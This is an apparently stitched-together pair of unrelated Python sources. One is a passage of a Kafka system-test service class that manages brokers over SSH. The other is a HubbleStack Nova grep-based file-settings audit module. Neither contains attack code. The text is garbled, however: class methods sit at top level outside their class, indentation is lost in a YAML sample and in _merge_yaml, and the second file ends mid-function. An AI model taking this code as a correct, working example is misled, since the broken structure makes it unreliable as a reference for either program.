    DATA_LOG_DIR_2 = "%s-2" % (DATA_LOG_DIR_PREFIX)
    CONFIG_FILE = os.path.join(PERSISTENT_ROOT, "kafka.properties")
    # Kafka Authorizer
    SIMPLE_AUTHORIZER = "kafka.security.auth.SimpleAclAuthorizer"
    # Artifacts ducktape can collect after a run; "collect_default" controls
    # whether each artifact is gathered even when the test passes.
    logs = {
        "kafka_server_start_stdout_stderr": {
            "path": STDOUT_STDERR_CAPTURE,
            "collect_default": True},
        "kafka_operational_logs_info": {
            "path": OPERATIONAL_LOG_INFO_DIR,
            "collect_default": True},
        "kafka_operational_logs_debug": {
            "path": OPERATIONAL_LOG_DEBUG_DIR,
            "collect_default": False},
        "kafka_data_1": {
            "path": DATA_LOG_DIR_1,
            "collect_default": False},
        "kafka_data_2": {
            "path": DATA_LOG_DIR_2,
            "collect_default": False}
    }
def __init__(self, context, num_nodes, zk, security_protocol=SecurityConfig.PLAINTEXT, interbroker_security_protocol=SecurityConfig.PLAINTEXT,
             client_sasl_mechanism=SecurityConfig.SASL_MECHANISM_GSSAPI, interbroker_sasl_mechanism=SecurityConfig.SASL_MECHANISM_GSSAPI,
             authorizer_class_name=None, topics=None, version=DEV_BRANCH, jmx_object_names=None,
             jmx_attributes=None, zk_connect_timeout=5000, zk_session_timeout=6000, server_prop_overides=None, zk_chroot=None):
    """
    :type context
    :type zk: ZookeeperService
    :type topics: dict mapping topic name -> topic config dict (or None)
    """
    Service.__init__(self, context, num_nodes)
    JmxMixin.__init__(self, num_nodes=num_nodes, jmx_object_names=jmx_object_names, jmx_attributes=(jmx_attributes or []),
                      root=KafkaService.PERSISTENT_ROOT)
    self.zk = zk
    self.security_protocol = security_protocol
    self.interbroker_security_protocol = interbroker_security_protocol
    self.client_sasl_mechanism = client_sasl_mechanism
    self.interbroker_sasl_mechanism = interbroker_sasl_mechanism
    self.topics = topics
    # MiniKdc is created lazily by start_minikdc() only when SASL is in use.
    self.minikdc = None
    self.authorizer_class_name = authorizer_class_name
    self.zk_set_acl = False
    # NOTE(review): "overides" (sic) is the established spelling in this API;
    # callers pass this keyword, so it cannot be renamed here.
    if server_prop_overides is None:
        self.server_prop_overides = []
    else:
        self.server_prop_overides = server_prop_overides
    self.log_level = "DEBUG"
    self.zk_chroot = zk_chroot
    #
    # In a heavily loaded and not very fast machine, it is
    # sometimes necessary to give more time for the zk client
    # to have its session established, especially if the client
    # is authenticating and waiting for the SaslAuthenticated
    # in addition to the SyncConnected event.
    #
    # The default value for zookeeper.connect.timeout.ms is
    # 2 seconds and here we increase it to 5 seconds, but
    # it can be overridden by setting the corresponding parameter
    # for this constructor.
    self.zk_connect_timeout = zk_connect_timeout
    # Also allow the session timeout to be provided explicitly,
    # primarily so that test cases can depend on it when waiting
    # e.g. brokers to deregister after a hard kill.
    self.zk_session_timeout = zk_session_timeout
    # Every listener starts closed; start() opens the ones actually in use.
    self.port_mappings = {
        'PLAINTEXT': Port('PLAINTEXT', 9092, False),
        'SSL': Port('SSL', 9093, False),
        'SASL_PLAINTEXT': Port('SASL_PLAINTEXT', 9094, False),
        'SASL_SSL': Port('SASL_SSL', 9095, False)
    }
    for node in self.nodes:
        node.version = version
        node.config = KafkaConfig(**{config_property.BROKER_ID: self.idx(node)})
def set_version(self, version):
    """Set the Kafka version every node will run on next start."""
    for node in self.nodes:
        node.version = version
@property
def security_config(self):
    """Build a SecurityConfig reflecting the currently-open listener ports."""
    config = SecurityConfig(self.context, self.security_protocol, self.interbroker_security_protocol,
                            zk_sasl=self.zk.zk_sasl,
                            client_sasl_mechanism=self.client_sasl_mechanism, interbroker_sasl_mechanism=self.interbroker_sasl_mechanism)
    for protocol in self.port_mappings:
        port = self.port_mappings[protocol]
        if port.open:
            config.enable_security_protocol(port.name)
    return config
def open_port(self, protocol):
    """Mark the listener port for `protocol` as enabled."""
    self.port_mappings[protocol] = self.port_mappings[protocol]._replace(open=True)
def close_port(self, protocol):
    """Mark the listener port for `protocol` as disabled."""
    self.port_mappings[protocol] = self.port_mappings[protocol]._replace(open=False)
def start_minikdc(self, add_principals=""):
    """Start a MiniKdc when SASL is enabled; otherwise clear any reference."""
    if self.security_config.has_sasl:
        if self.minikdc is None:
            self.minikdc = MiniKdc(self.context, self.nodes, extra_principals = add_principals)
            self.minikdc.start()
    else:
        self.minikdc = None
def alive(self, node):
    """Return True if at least one broker process is running on `node`."""
    return len(self.pids(node)) > 0
def start(self, add_principals=""):
    """Start all brokers, wait for ZK registration, then create topics.

    Opens the client and inter-broker listener ports, starts a MiniKdc if
    SASL is in use, ensures the configured ZK chroot exists, starts the
    brokers, waits (up to 30s) until every node is registered in ZooKeeper,
    and finally creates any topics configured on this service.
    """
    self.open_port(self.security_protocol)
    self.open_port(self.interbroker_security_protocol)
    self.start_minikdc(add_principals)
    self._ensure_zk_chroot()
    Service.start(self)
    self.logger.info("Waiting for brokers to register at ZK")
    expected_broker_ids = set(self.nodes)
    # wait_until raises on timeout, so no manual retry bookkeeping is needed.
    # (Previously a `retries` counter was declared but never decremented,
    # making its == 0 check dead code.)
    wait_until(lambda: {node for node in self.nodes if self.is_registered(node)} == expected_broker_ids,
               timeout_sec=30, backoff_sec=1,
               err_msg="Kafka servers didn't register at ZK within 30 seconds")
    # Create topics if necessary
    if self.topics is not None:
        for topic, topic_cfg in self.topics.items():
            if topic_cfg is None:
                topic_cfg = {}
            topic_cfg["topic"] = topic
            self.create_topic(topic_cfg)
def _ensure_zk_chroot(self):
    """Create the configured ZK chroot path (and all parents) if set."""
    self.logger.info("Ensuring zk_chroot %s exists", self.zk_chroot)
    if self.zk_chroot:
        if not self.zk_chroot.startswith('/'):
            raise Exception("Zookeeper chroot must start with '/' but found " + self.zk_chroot)
        parts = self.zk_chroot.split('/')[1:]
        # Create each ancestor znode in turn, e.g. /a, /a/b, /a/b/c.
        for i in range(len(parts)):
            self.zk.create('/' + '/'.join(parts[:i+1]))
def set_protocol_and_port(self, node):
    """Compute listeners/advertised.listeners strings from the open ports."""
    listeners = []
    advertised_listeners = []
    for protocol in self.port_mappings:
        port = self.port_mappings[protocol]
        if port.open:
            listeners.append(port.name + "://:" + str(port.number))
            advertised_listeners.append(port.name + "://" + node.account.hostname + ":" + str(port.number))
    self.listeners = ','.join(listeners)
    self.advertised_listeners = ','.join(advertised_listeners)
def prop_file(self, node):
    """Render the kafka.properties contents for `node`."""
    cfg = KafkaConfig(**node.config)
    cfg[config_property.ADVERTISED_HOSTNAME] = node.account.hostname
    cfg[config_property.ZOOKEEPER_CONNECT] = self.zk_connect_setting()
    # Per-test overrides take precedence over the node's base config.
    for prop in self.server_prop_overides:
        cfg[prop[0]] = prop[1]
    self.set_protocol_and_port(node)
    # TODO - clean up duplicate configuration logic
    prop_file = cfg.render()
    prop_file += self.render('kafka.properties', node=node, broker_id=self.idx(node),
                             security_config=self.security_config, num_nodes=self.num_nodes)
    return prop_file
def start_cmd(self, node):
    """Build the shell command line that launches the broker on `node`."""
    cmd = "export JMX_PORT=%d; " % self.jmx_port
    cmd += "export KAFKA_LOG4J_OPTS=\"-Dlog4j.configuration=file:%s\"; " % self.LOG4J_CONFIG
    cmd += "export KAFKA_OPTS=%s; " % self.security_config.kafka_opts
    # Launch in the background, capturing stdout+stderr for later collection.
    cmd += "%s %s 1>> %s 2>> %s &" % \
        (self.path.script("kafka-server-start.sh", node),
         KafkaService.CONFIG_FILE,
         KafkaService.STDOUT_STDERR_CAPTURE,
         KafkaService.STDOUT_STDERR_CAPTURE)
    return cmd
def start_node(self, node):
    """Configure and launch the broker on `node`, waiting for startup.

    Writes the properties and log4j config files, sets up security
    credentials, starts the JVM in the background, and blocks until the
    server log reports startup. Raises if no broker process is found
    afterwards.
    """
    node.account.mkdirs(KafkaService.PERSISTENT_ROOT)
    prop_file = self.prop_file(node)
    self.logger.info("kafka.properties:")
    self.logger.info(prop_file)
    node.account.create_file(KafkaService.CONFIG_FILE, prop_file)
    node.account.create_file(self.LOG4J_CONFIG, self.render('log4j.properties', log_dir=KafkaService.OPERATIONAL_LOG_DIR))
    self.security_config.setup_node(node)
    self.security_config.setup_credentials(node, self.path, self.zk_connect_setting(), broker=True)
    cmd = self.start_cmd(node)
    self.logger.debug("Attempting to start KafkaService on %s with command: %s" % (str(node.account), cmd))
    with node.account.monitor_log(KafkaService.STDOUT_STDERR_CAPTURE) as monitor:
        node.account.ssh(cmd)
        # Kafka 1.0.0 and higher don't have a space between "Kafka" and "Server".
        # Raw string so "\s" stays a regex escape instead of an invalid
        # string escape (DeprecationWarning on newer Pythons).
        monitor.wait_until(r"Kafka\s*Server.*started", timeout_sec=30, backoff_sec=.25, err_msg="Kafka server didn't finish startup")
    # Credentials for inter-broker communication are created before starting Kafka.
    # Client credentials are created after starting Kafka so that both loading of
    # existing credentials from ZK and dynamic update of credentials in Kafka are tested.
    self.security_config.setup_credentials(node, self.path, self.zk_connect_setting(), broker=False)
    self.start_jmx_tool(self.idx(node), node)
    if len(self.pids(node)) == 0:
        raise Exception("No process ids recorded on node %s" % node.account.hostname)
def pids(self, node):
    """Return process ids associated with running processes on the given node."""
    try:
        # jcmd lists JVMs by main class; filter for the Kafka entry point.
        cmd = "jcmd | grep -e %s | awk '{print $1}'" % self.java_class_name()
        pid_arr = [pid for pid in node.account.ssh_capture(cmd, allow_fail=True, callback=int)]
        return pid_arr
    except (RemoteCommandError, ValueError) as e:
        # No broker running (or unparseable output) -> no pids.
        return []
def signal_node(self, node, sig=signal.SIGTERM):
    """Send `sig` to every Kafka process on `node`."""
    pids = self.pids(node)
    for pid in pids:
        node.account.signal(pid, sig)
def signal_leader(self, topic, partition=0, sig=signal.SIGTERM):
    """Send `sig` to the broker currently leading the given partition."""
    leader = self.leader(topic, partition)
    self.signal_node(leader, sig)
def stop_node(self, node, clean_shutdown=True):
    """Stop the broker on `node` (SIGTERM if clean, else SIGKILL) and wait."""
    pids = self.pids(node)
    sig = signal.SIGTERM if clean_shutdown else signal.SIGKILL
    for pid in pids:
        node.account.signal(pid, sig, allow_fail=False)
    try:
        wait_until(lambda: len(self.pids(node)) == 0, timeout_sec=60, err_msg="Kafka node failed to stop")
    except Exception:
        # Capture JVM thread state before propagating, to help debug hangs.
        self.thread_dump(node)
        raise
def thread_dump(self, node):
    """Ask each broker JVM on `node` to dump its threads (SIGQUIT)."""
    for pid in self.pids(node):
        try:
            node.account.signal(pid, signal.SIGQUIT, allow_fail=True)
        except:
            self.logger.warn("Could not dump threads on node")
def clean_node(self, node):
    """Kill any leftover broker processes and remove all persistent state."""
    JmxMixin.clean_node(self, node)
    self.security_config.clean_node(node)
    node.account.kill_java_processes(self.java_class_name(),
                                     clean_shutdown=False, allow_fail=True)
    node.account.ssh("sudo rm -rf -- %s" % KafkaService.PERSISTENT_ROOT, allow_fail=False)
def create_topic(self, topic_cfg, node=None):
    """Run the admin tool create topic command.
    Specifying node is optional, and may be done if for different kafka nodes have different versions,
    and we care where command gets run.
    If the node is not specified, run the command from self.nodes[0]
    """
    if node is None:
        node = self.nodes[0]
    self.logger.info("Creating topic %s with settings %s",
                     topic_cfg["topic"], topic_cfg)
    kafka_topic_script = self.path.script("kafka-topics.sh", node)
    cmd = kafka_topic_script + " "
    cmd += "--zookeeper %(zk_connect)s --create --topic %(topic)s " % {
        'zk_connect': self.zk_connect_setting(),
        'topic': topic_cfg.get("topic"),
    }
    # Either an explicit replica assignment, or partition/replication counts.
    if 'replica-assignment' in topic_cfg:
        cmd += " --replica-assignment %(replica-assignment)s" % {
            'replica-assignment': topic_cfg.get('replica-assignment')
        }
    else:
        cmd += " --partitions %(partitions)d --replication-factor %(replication-factor)d" % {
            'partitions': topic_cfg.get('partitions', 1),
            'replication-factor': topic_cfg.get('replication-factor', 1)
        }
    if topic_cfg.get('if-not-exists', False):
        cmd += ' --if-not-exists'
    if "configs" in topic_cfg.keys() and topic_cfg["configs"] is not None:
        for config_name, config_value in topic_cfg["configs"].items():
            cmd += " --config %s=%s" % (config_name, str(config_value))
    self.logger.info("Running topic creation command...\n%s" % cmd)
    node.account.ssh(cmd)
    # Give the controller a moment to propagate the new topic metadata.
    time.sleep(1)
    self.logger.info("Checking to see if topic was properly created...\n%s" % cmd)
    for line in self.describe_topic(topic_cfg["topic"]).split("\n"):
        self.logger.info(line)
def describe_topic(self, topic, node=None):
    """Return the raw output of kafka-topics.sh --describe for `topic`."""
    if node is None:
        node = self.nodes[0]
    cmd = "%s --zookeeper %s --topic %s --describe" % \
          (self.path.script("kafka-topics.sh", node), self.zk_connect_setting(), topic)
    output = ""
    for line in node.account.ssh_capture(cmd):
        output += line
    return output
def list_topics(self, topic, node=None):
    """Yield topic names from kafka-topics.sh --list, skipping SLF4J noise."""
    if node is None:
        node = self.nodes[0]
    cmd = "%s --zookeeper %s --list" % \
          (self.path.script("kafka-topics.sh", node), self.zk_connect_setting())
    for line in node.account.ssh_capture(cmd):
        if not line.startswith("SLF4J"):
            yield line.rstrip()
def alter_message_format(self, topic, msg_format_version, node=None):
    """Set message.format.version for `topic` via kafka-configs.sh."""
    if node is None:
        node = self.nodes[0]
    self.logger.info("Altering message format version for topic %s with format %s", topic, msg_format_version)
    cmd = "%s --zookeeper %s --entity-name %s --entity-type topics --alter --add-config message.format.version=%s" % \
          (self.path.script("kafka-configs.sh", node), self.zk_connect_setting(), topic, msg_format_version)
    self.logger.info("Running alter message format command...\n%s" % cmd)
    node.account.ssh(cmd)
def parse_describe_topic(self, topic_description):
    """Parse output of kafka-topics.sh --describe (or describe_topic() method above), which is a string of form
    PartitionCount:2\tReplicationFactor:2\tConfigs:
    Topic: test_topic\tPartition: 0\tLeader: 3\tReplicas: 3,1\tIsr: 3,1
    Topic: test_topic\tPartition: 1\tLeader: 1\tReplicas: 1,2\tIsr: 1,2
    into a dictionary structure appropriate for use with reassign-partitions tool:
    {
        "partitions": [
            {"topic": "test_topic", "partition": 0, "replicas": [3, 1]},
            {"topic": "test_topic", "partition": 1, "replicas": [1, 2]}
        ]
    }
    """
    partitions = []
    for line in topic_description.split("\n"):
        line = line.strip()
        # Only per-partition rows carry a "Leader:" field; skip the header.
        if re.match(".*Leader:.*", line) is None:
            continue
        # ["Topic: t", "Partition: 4", "Leader: 0", ...] -> ["t", "4", "0", ...]
        # List comprehensions (not map()) so the result is indexable on
        # Python 3 as well, where map() returns an iterator.
        fields = [field.split(" ")[1] for field in line.split("\t")]
        partitions.append(
            {"topic": fields[0],
             "partition": int(fields[1]),
             "replicas": [int(r) for r in fields[3].split(',')]})
    return {"partitions": partitions}
def verify_reassign_partitions(self, reassignment, node=None):
    """Run the reassign partitions admin tool in "verify" mode.
    Returns True only when the reassignment has completed (i.e. it has
    neither failed nor is still in progress).
    """
    if node is None:
        node = self.nodes[0]
    json_file = "/tmp/%s_reassign.json" % str(time.time())
    # reassignment to json
    json_str = json.dumps(reassignment)
    # Double-encode so the embedded quotes survive the shell `echo` below.
    json_str = json.dumps(json_str)
    # create command
    cmd = "echo %s > %s && " % (json_str, json_file)
    cmd += "%s " % self.path.script("kafka-reassign-partitions.sh", node)
    cmd += "--zookeeper %s " % self.zk_connect_setting()
    cmd += "--reassignment-json-file %s " % json_file
    cmd += "--verify "
    cmd += "&& sleep 1 && rm -f %s" % json_file
    # send command
    self.logger.info("Verifying parition reassignment...")
    self.logger.debug(cmd)
    output = ""
    for line in node.account.ssh_capture(cmd):
        output += line
    self.logger.debug(output)
    if re.match(".*Reassignment of partition.*failed.*",
                output.replace('\n', '')) is not None:
        return False
    if re.match(".*is still in progress.*",
                output.replace('\n', '')) is not None:
        return False
    return True
def execute_reassign_partitions(self, reassignment, node=None,
                                throttle=None):
    """Run the reassign partitions admin tool in "execute" mode,
    optionally throttling replication traffic.
    """
    if node is None:
        node = self.nodes[0]
    json_file = "/tmp/%s_reassign.json" % str(time.time())
    # reassignment to json
    json_str = json.dumps(reassignment)
    # Double-encode so the embedded quotes survive the shell `echo` below.
    json_str = json.dumps(json_str)
    # create command
    cmd = "echo %s > %s && " % (json_str, json_file)
    cmd += "%s " % self.path.script( "kafka-reassign-partitions.sh", node)
    cmd += "--zookeeper %s " % self.zk_connect_setting()
    cmd += "--reassignment-json-file %s " % json_file
    cmd += "--execute"
    if throttle is not None:
        cmd += " --throttle %d" % throttle
    cmd += " && sleep 1 && rm -f %s" % json_file
    # send command
    self.logger.info("Executing parition reassignment...")
    self.logger.debug(cmd)
    output = ""
    for line in node.account.ssh_capture(cmd):
        output += line
    self.logger.debug("Verify partition reassignment:")
    self.logger.debug(output)
def search_data_files(self, topic, messages):
    """Check if a set of messages made it into the Kafka data files. Note that
    this method takes no account of replication. It simply looks for the
    payload in all the partition files of the specified topic. 'messages' should be
    an array of numbers. The list of missing messages is returned.
    """
    # One alternation regex matching "payload: <n>" at end-of-line per value.
    payload_match = "payload: " + "$|payload: ".join(str(x) for x in messages) + "$"
    found = set([])
    self.logger.debug("number of unique missing messages we will search for: %d",
                      len(messages))
    for node in self.nodes:
        # Grab all .log files in directories prefixed with this topic
        files = node.account.ssh_capture("find %s* -regex '.*/%s-.*/[^/]*.log'" % (KafkaService.DATA_LOG_DIR_PREFIX, topic))
        # Check each data file to see if it contains the messages we want
        for log in files:
            cmd = "%s kafka.tools.DumpLogSegments --print-data-log --files %s | grep -E \"%s\"" % \
                  (self.path.script("kafka-run-class.sh", node), log.strip(), payload_match)
            for line in node.account.ssh_capture(cmd, allow_fail=True):
                for val in messages:
                    if line.strip().endswith("payload: "+str(val)):
                        self.logger.debug("Found %s in data-file [%s] in line: [%s]" % (val, log.strip(), line.strip()))
                        found.add(val)
    self.logger.debug("Number of unique messages found in the log: %d",
                      len(found))
    missing = list(set(messages) - found)
    if len(missing) > 0:
        self.logger.warn("The following values were not found in the data files: " + str(missing))
    return missing
def restart_node(self, node, clean_shutdown=True):
    """Restart the given node."""
    self.stop_node(node, clean_shutdown)
    self.start_node(node)
def isr_idx_list(self, topic, partition=0):
    """ Get in-sync replica list the given topic and partition.
    """
    self.logger.debug("Querying zookeeper to find in-sync replicas for topic %s and partition %d" % (topic, partition))
    zk_path = "/brokers/topics/%s/partitions/%d/state" % (topic, partition)
    partition_state = self.zk.query(zk_path, chroot=self.zk_chroot)
    if partition_state is None:
        raise Exception("Error finding partition state for topic %s and partition %d." % (topic, partition))
    partition_state = json.loads(partition_state)
    self.logger.info(partition_state)
    isr_idx_list = partition_state["isr"]
    self.logger.info("Isr for topic %s and partition %d is now: %s" % (topic, partition, isr_idx_list))
    return isr_idx_list
def replicas(self, topic, partition=0):
    """ Get the assigned replicas for the given topic and partition.

    Queries the topic's znode in ZooKeeper and maps each replica broker id
    to its cluster node. Raises if the topic is unknown to ZooKeeper.
    """
    self.logger.debug("Querying zookeeper to find assigned replicas for topic %s and partition %d" % (topic, partition))
    zk_path = "/brokers/topics/%s" % (topic)
    # (Renamed misspelled local "assignemnt" -> "assignment".)
    assignment = self.zk.query(zk_path, chroot=self.zk_chroot)
    if assignment is None:
        raise Exception("Error finding partition state for topic %s and partition %d." % (topic, partition))
    assignment = json.loads(assignment)
    self.logger.info(assignment)
    replicas = assignment["partitions"][str(partition)]
    self.logger.info("Assigned replicas for topic %s and partition %d is now: %s" % (topic, partition, replicas))
    return [self.get_node(replica) for replica in replicas]
def leader(self, topic, partition=0):
    """ Get the leader replica for the given topic and partition.
    """
    self.logger.debug("Querying zookeeper to find leader replica for topic %s and partition %d" % (topic, partition))
    zk_path = "/brokers/topics/%s/partitions/%d/state" % (topic, partition)
    partition_state = self.zk.query(zk_path, chroot=self.zk_chroot)
    if partition_state is None:
        raise Exception("Error finding partition state for topic %s and partition %d." % (topic, partition))
    partition_state = json.loads(partition_state)
    self.logger.info(partition_state)
    leader_idx = int(partition_state["leader"])
    self.logger.info("Leader for topic %s and partition %d is now: %d" % (topic, partition, leader_idx))
    return self.get_node(leader_idx)
def cluster_id(self):
    """ Get the current cluster id
    """
    self.logger.debug("Querying ZooKeeper to retrieve cluster id")
    cluster = self.zk.query("/cluster/id", chroot=self.zk_chroot)
    try:
        return json.loads(cluster)['id'] if cluster else None
    except:
        self.logger.debug("Data in /cluster/id znode could not be parsed. Data = %s" % cluster)
        raise
def list_consumer_groups(self, node=None, command_config=None):
    """ Get list of consumer groups.
    command_config: optional path to a properties file passed via
    --command-config (e.g. for secured clusters).
    """
    if node is None:
        node = self.nodes[0]
    consumer_group_script = self.path.script("kafka-consumer-groups.sh", node)
    if command_config is None:
        command_config = ""
    else:
        command_config = "--command-config " + command_config
    cmd = "%s --bootstrap-server %s %s --list" % \
          (consumer_group_script,
           self.bootstrap_servers(self.security_protocol),
           command_config)
    output = ""
    self.logger.debug(cmd)
    for line in node.account.ssh_capture(cmd):
        if not line.startswith("SLF4J"):
            output += line
    self.logger.debug(output)
    return output
def describe_consumer_group(self, group, node=None, command_config=None):
    """ Describe a consumer group.
    """
    if node is None:
        node = self.nodes[0]
    consumer_group_script = self.path.script("kafka-consumer-groups.sh", node)
    if command_config is None:
        command_config = ""
    else:
        command_config = "--command-config " + command_config
    cmd = "%s --bootstrap-server %s %s --group %s --describe" % \
          (consumer_group_script,
           self.bootstrap_servers(self.security_protocol),
           command_config, group)
    output = ""
    self.logger.debug(cmd)
    for line in node.account.ssh_capture(cmd):
        # Drop logging noise, column headers and transient fetch warnings.
        if not (line.startswith("SLF4J") or line.startswith("TOPIC") or line.startswith("Could not fetch offset")):
            output += line
    self.logger.debug(output)
    return output
def zk_connect_setting(self):
    """Return the ZooKeeper connect string (host:port[/chroot])."""
    return self.zk.connect_setting(self.zk_chroot)
def bootstrap_servers(self, protocol='PLAINTEXT', validate=True, offline_nodes=None):
    """Return comma-delimited list of brokers in this cluster formatted as HOSTNAME1:PORT1,HOSTNAME:PORT2,...
    This is the format expected by many config files.

    protocol: which listener's port to report.
    validate: raise ValueError if that listener is not currently open.
    offline_nodes: nodes to exclude from the list (default: none).
    """
    # None instead of a mutable [] default, to avoid the shared-default
    # pitfall; semantics are unchanged for all callers.
    if offline_nodes is None:
        offline_nodes = []
    port_mapping = self.port_mappings[protocol]
    self.logger.info("Bootstrap client port is: " + str(port_mapping.number))
    if validate and not port_mapping.open:
        raise ValueError("We are retrieving bootstrap servers for the port: %s which is not currently open. - " % str(port_mapping))
    return ','.join([node.account.hostname + ":" + str(port_mapping.number) for node in self.nodes if node not in offline_nodes])
def controller(self):
    """ Get the controller node
    """
    self.logger.debug("Querying zookeeper to find controller broker")
    controller_info = self.zk.query("/controller", chroot=self.zk_chroot)
    if controller_info is None:
        raise Exception("Error finding controller info")
    controller_info = json.loads(controller_info)
    self.logger.debug(controller_info)
    controller_idx = int(controller_info["brokerid"])
    self.logger.info("Controller's ID: %d" % (controller_idx))
    return self.get_node(controller_idx)
def is_registered(self, node):
    """
    Check whether a broker is registered in Zookeeper
    """
    self.logger.debug("Querying zookeeper to see if broker %s is registered", node)
    broker_info = self.zk.query("/brokers/ids/%s" % self.idx(node), chroot=self.zk_chroot)
    self.logger.debug("Broker info: %s", broker_info)
    return broker_info is not None
def get_offset_shell(self, topic, partitions, max_wait_ms, offsets, time):
    """Run kafka.tools.GetOffsetShell and return its captured output.
    NOTE(review): the `time` parameter shadows the module-level `time`
    import inside this method; confirm before renaming either.
    """
    node = self.nodes[0]
    cmd = self.path.script("kafka-run-class.sh", node)
    cmd += " kafka.tools.GetOffsetShell"
    cmd += " --topic %s --broker-list %s --max-wait-ms %s --offsets %s --time %s" % (topic, self.bootstrap_servers(self.security_protocol), max_wait_ms, offsets, time)
    if partitions:
        cmd += ' --partitions %s' % partitions
    cmd += " 2>> %s/get_offset_shell.log" % KafkaService.PERSISTENT_ROOT
    cmd += " | tee -a %s/get_offset_shell.log &" % KafkaService.PERSISTENT_ROOT
    output = ""
    self.logger.debug(cmd)
    for line in node.account.ssh_capture(cmd):
        output += line
    self.logger.debug(output)
    return output
def java_class_name(self):
    """Main class name used to locate broker JVMs via jcmd | grep."""
    return "kafka.Kafka"
| |
# -*- encoding: utf-8 -*-
'''
HubbleStack Nova plugin for using grep to verify settings in files.
Supports both blacklisting and whitelisting patterns. Blacklisted patterns must
not be found in the specified file. Whitelisted patterns must be found in the
specified file.
:maintainer: HubbleStack / basepi
:maturity: 2016.7.0
:platform: All
:requires: SaltStack
This audit module requires yaml data to execute. It will search the local
directory for any .yaml files, and if it finds a top-level 'grep' key, it will
use that data.
Sample YAML data, with inline comments:
grep:
whitelist: # or blacklist
fstab_tmp_partition: # unique ID
data:
CentOS Linux-6: # osfinger grain
- '/etc/fstab': # filename
tag: 'CIS-1.1.1' # audit tag
pattern: '/tmp' # grep pattern
match_output: 'nodev' # string to check for in output of grep command (optional)
match_output_regex: True # whether to use regex when matching output (default: False)
grep_args: # extra args to grep
- '-E'
- '-i'
- '-B2'
match_on_file_missing: True # See (1) below
'*': # wildcard, will be run if no direct osfinger match
- '/etc/fstab':
tag: 'CIS-1.1.1'
pattern: '/tmp'
# The rest of these attributes are optional, and currently not used
description: |
The /tmp directory is intended to be world-writable, which presents a risk
of resource exhaustion if it is not bound to a separate partition.
alert: email
trigger: state
(1) If `match_on_file_missing` is omitted, success/failure will be determined
entirely based on the grep command and other arguments. If it's set to True and
the file is missing, then it will be considered a match (success for whitelist,
failure for blacklist). If it's set to False and the file is missing, then it
will be considered a non-match (success for blacklist, failure for whitelist).
If the file exists, this setting is ignored.
'''
from __future__ import absolute_import
import logging
import fnmatch
import yaml
import os
import copy
import salt.utils
import re
from distutils.version import LooseVersion
log = logging.getLogger(__name__)
def __virtual__():
    '''
    Only load this audit module on non-Windows hosts.
    '''
    on_windows = salt.utils.is_windows()
    if not on_windows:
        return True
    return False, 'This audit module only runs on linux'
def audit(data_list, tags, verbose=False, show_profile=False, debug=False):
    '''
    Run the grep audits contained in the YAML files processed by __virtual__

    data_list
        List of (profile, data) tuples of already-loaded yaml rule data.
    tags
        Glob pattern restricting which audit tags are run.
    verbose
        If True, return full tag data per result; otherwise just
        {tag: description} entries.
    show_profile
        If True, annotate each merged rule with its source profile.
    debug
        If True, log the merged data and tag map.
    '''
    __data__ = {}
    for profile, data in data_list:
        if show_profile:
            _merge_yaml(__data__, data, profile)
        else:
            _merge_yaml(__data__, data)
    __tags__ = _get_tags(__data__)
    if debug:
        log.debug('grep audit __data__:')
        log.debug(__data__)
        log.debug('grep audit __tags__:')
        log.debug(__tags__)
    ret = {'Success': [], 'Failure': [], 'Controlled': []}
    for tag in __tags__:
        if fnmatch.fnmatch(tag, tags):
            for tag_data in __tags__[tag]:
                # Rules carrying a 'control' key are acknowledged but not run.
                if 'control' in tag_data:
                    ret['Controlled'].append(tag_data)
                    continue
                name = tag_data['name']
                audittype = tag_data['type']
                # A rule without a grep pattern is an authoring error: record
                # it as a failure rather than crashing.
                if 'pattern' not in tag_data:
                    log.error('No pattern found for grep audit {0}, file {1}'
                              .format(tag, name))
                    tag_data = copy.deepcopy(tag_data)
                    # BUG FIX: previously 'No pattern found'.format(mod) with
                    # an undefined name `mod`, which raised NameError here.
                    tag_data['error'] = 'No pattern found'
                    ret['Failure'].append(tag_data)
                    continue
                grep_args = tag_data.get('grep_args', [])
                if isinstance(grep_args, str):
                    grep_args = [grep_args]
                grep_ret = _grep(name,
                                 tag_data['pattern'],
                                 *grep_args).get('stdout')
                found = False
                if grep_ret:
                    found = True
                    # Optionally require a substring/regex match in the output.
                    if 'match_output' in tag_data:
                        if not tag_data.get('match_output_regex'):
                            if tag_data['match_output'] not in grep_ret:
                                found = False
                        else:  # match with regex
                            if not re.match(tag_data['match_output'], grep_ret):
                                found = False
                # A missing file can be forced to count as match or non-match.
                if not os.path.exists(name) and 'match_on_file_missing' in tag_data:
                    if tag_data['match_on_file_missing']:
                        found = True
                    else:
                        found = False
                # Blacklisted pattern (must not be found)
                if audittype == 'blacklist':
                    if found:
                        ret['Failure'].append(tag_data)
                    else:
                        ret['Success'].append(tag_data)
                # Whitelisted pattern (must be found)
                elif audittype == 'whitelist':
                    if found:
                        ret['Success'].append(tag_data)
                    else:
                        ret['Failure'].append(tag_data)
    failure = []
    success = []
    controlled = []
    if not verbose:
        # Pull out just the tag and description
        tags_descriptions = set()
        for tag_data in ret['Failure']:
            tag = tag_data['tag']
            description = tag_data.get('description')
            if (tag, description) not in tags_descriptions:
                failure.append({tag: description})
                tags_descriptions.add((tag, description))
        tags_descriptions = set()
        for tag_data in ret['Success']:
            tag = tag_data['tag']
            description = tag_data.get('description')
            if (tag, description) not in tags_descriptions:
                success.append({tag: description})
                tags_descriptions.add((tag, description))
        control_reasons = set()
        for tag_data in ret['Controlled']:
            tag = tag_data['tag']
            control_reason = tag_data.get('control', '')
            description = tag_data.get('description')
            if (tag, description, control_reason) not in control_reasons:
                tag_dict = {'description': description,
                            'control': control_reason}
                controlled.append({tag: tag_dict})
                control_reasons.add((tag, description, control_reason))
    else:
        # Format verbose output as single-key dictionaries with tag as key
        for tag_data in ret['Failure']:
            tag = tag_data['tag']
            failure.append({tag: tag_data})
        for tag_data in ret['Success']:
            tag = tag_data['tag']
            success.append({tag: tag_data})
        for tag_data in ret['Controlled']:
            tag = tag_data['tag']
            controlled.append({tag: tag_data})
    ret['Controlled'] = controlled
    ret['Success'] = success
    ret['Failure'] = failure
    if not ret['Controlled']:
        ret.pop('Controlled')
    return ret
def _merge_yaml(ret, data, profile=None):
'''
Merge two yaml dicts together at the grep:blacklist and grep:whitelist level
'''
if 'grep' not in ret:
ret['grep'] = {}
for topkey in ('blacklist', 'whitelist'):
if topkey in data.get('grep', {}):
if topkey not in ret['grep']:
ret['grep'][topkey] = []
for key, val in data['grep'][topkey].iteritems():
if profile and isinstance(val, dict):
val['nova_profile'] = profile
ret['grep'][topkey].append({key: val})
return ret
def _get_tags(data):
    '''
